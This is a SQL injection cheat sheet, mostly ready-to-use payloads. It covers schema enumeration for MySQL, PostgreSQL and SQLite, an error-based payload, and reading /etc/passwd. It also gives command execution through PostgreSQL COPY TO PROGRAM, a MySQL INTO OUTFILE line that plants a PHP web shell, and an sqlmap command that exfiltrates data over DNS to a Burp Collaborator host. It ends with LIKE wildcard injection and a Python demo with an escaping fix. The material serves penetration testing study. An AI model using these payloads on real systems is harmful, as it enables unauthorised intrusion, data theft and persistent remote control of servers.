SQL Injection

Database enumeration

MySQL

SELECT GROUP_CONCAT(schema_name,',') FROM information_schema.schemata;
SELECT GROUP_CONCAT(table_name,',') FROM information_schema.tables;
SELECT GROUP_CONCAT(column_name,',') FROM information_schema.columns WHERE table_name = 'users';

PostgreSQL

SELECT datname FROM pg_database;
SELECT string_agg(table_name,',') FROM information_schema.tables;
SELECT string_agg(column_name,',') FROM information_schema.columns WHERE table_name = 'users';

SQLite

SELECT GROUP_CONCAT(tbl_name,',') FROM sqlite_master WHERE type='table' AND tbl_name NOT like 'sqlite_%';
SELECT sql FROM sqlite_master WHERE tbl_name='users';
SELECT GROUP_CONCAT(name,',') FROM PRAGMA_TABLE_INFO('users');

Error based

PostgreSQL

' AND 1=CAST((SELECT username FROM users) AS int)--

File read/write & RCE

PostgreSQL

SELECT pg_ls_dir('.');
SELECT pg_read_file('/etc/passwd');
COPY (SELECT '') TO PROGRAM 'sleep 5';

MySQL

SELECT LOAD_FILE('/etc/passwd');
SELECT '<?php system($_REQUEST[c]); ?>' INTO OUTFILE '/var/www/html/shell.php';

Faster Exfiltration via DNS

  • https://github.com/PortSwigger/sqlmap-dns-collaborator
  • https://arxiv.org/ftp/arxiv/papers/1303/1303.3047.pdf

SqlmapDnsCollaborator is a Burp Extension that lets you perform DNS exfiltration with Sqlmap with zero configuration needed. You won't need a domain name or a public IP, just a computer with Sqlmap and Burp.

How you would normally perform DNS exfiltration with Sqlmap:

  1. You buy a domain name and a public IP, then set up a server.
  2. You run Sqlmap on that server, which performs the SQL injection against the vulnerable target.
  3. The vulnerable target sends DNS requests containing the interesting data to your DNS server.
  4. The DNS requests are interpreted by Sqlmap.

How you are going to perform DNS exfiltration with Sqlmap and SqlmapDnsCollaborator:

  1. You open Burp on your computer and enable SqlmapDnsCollaborator.
  2. You run Sqlmap on your computer, which performs the SQL injection against the vulnerable target.
  3. The vulnerable target sends DNS requests containing the interesting data to Burp Collaborator.
  4. SqlmapDnsCollaborator reads the DNS requests from Burp Collaborator and sends them to Sqlmap.
  5. The DNS requests are interpreted by Sqlmap.

sqlmap.py -r req.txt --dns-domain=yourcollab.burpcollaborator.net -v3

SQL "LIKE" Wildcard Injection

This vulnerability, often overlooked and considered low risk, can have significant impacts in certain scenarios. It involves injecting a wildcard in the search field of a LIKE clause in a SQL statement.

Types of Wildcards

  • %: Equivalent to any string of zero or more characters.
  • _: Equivalent to any single character.

Vulnerability

An application becomes vulnerable when it uses the LIKE operator with a user-received parameter without filtering these wildcards. For example:

SELECT text FROM table WHERE secrets LIKE '$secret'

Even if the $secret parameter is sanitized to prevent SQL injection, wildcards can still be injected: http://www.vulnerable.com/reset.php?secret=<guessed_chars>_____________

Each trailing "_" matches any single character, so the LIKE clause succeeds as soon as the guessed prefix is correct, even though the full secret was never supplied.
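The following is an added example, not code from the original page: it reproduces the LIKE wildcard problem above against a constructed in-memory SQLite table and shows the fix (escape `%`, `_` and the escape character in the user value, and name that character in an ESCAPE clause). The table, column and token values are assumptions for the demo; for a secret such as a reset token, comparing with `=` rather than `LIKE` is the simpler fix.

```python
import sqlite3

# Constructed sample data (not from the page): two reset tokens, 12 chars each.
SECRETS = ["a1b2c3d4e5f6", "9f8e7d6c5b4a"]


def _conn() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE reset_tokens (id INTEGER PRIMARY KEY, secret TEXT NOT NULL)")
    conn.executemany("INSERT INTO reset_tokens (secret) VALUES (?)", [(s,) for s in SECRETS])
    return conn


def lookup_vulnerable(user_input: str) -> int:
    """Parameterised, so classic SQL injection is blocked, but LIKE wildcards
    inside user_input are still interpreted by the database."""
    conn = _conn()
    row = conn.execute(
        "SELECT COUNT(*) FROM reset_tokens WHERE secret LIKE ?", (user_input,)
    ).fetchone()
    return row[0]


def escape_like(value: str, esc: str = "\\") -> str:
    """Neutralise LIKE metacharacters. The escape character itself must be
    doubled first, otherwise a user-supplied backslash would un-escape a
    wildcard we add afterwards."""
    return (
        value.replace(esc, esc + esc)
        .replace("%", esc + "%")
        .replace("_", esc + "_")
    )


def lookup_hardened(user_input: str) -> int:
    """Same query, but the value is escaped and the ESCAPE clause tells the
    database which character marks a literal '%' or '_'."""
    conn = _conn()
    row = conn.execute(
        "SELECT COUNT(*) FROM reset_tokens WHERE secret LIKE ? ESCAPE '\\'",
        (escape_like(user_input),),
    ).fetchone()
    return row[0]
```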

Sources